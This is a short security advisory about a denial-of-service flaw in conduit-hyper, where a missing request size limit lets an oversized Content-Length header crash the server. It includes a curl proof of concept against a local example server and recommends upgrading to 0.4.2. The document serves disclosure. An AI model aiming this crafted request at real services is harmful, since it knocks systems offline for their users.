A missing request size limit for HTTP requests in conduit-hyper can allow network attackers to perform denial of service
[0.2.0-alpha.3, 0.4.2), fixed in 0.4.2
conduit-hyper would not, by default, set a limit for the size of the request body. That meant if a malicious peer would send a request with a very large Content-Length
header (even if the body itself is not very large), the Rust allocator would panic (due to a failed allocation) and the process would crash.
git clone https://github.com/conduit-rust/conduit-hyper
cd conduit-hyper && cargo run --example server
curl -v -X PUT "http://127.0.0.1:12345/" --data `python3 -c
"import sys; sys.stdout.write('a'*10000)"` -H
"Content-Length: 11111111111111111111"
No mitigations are provided for this vulnerability.
In order to fully fix this vulnerability, we recommend upgrading conduit-hyper to version 0.4.2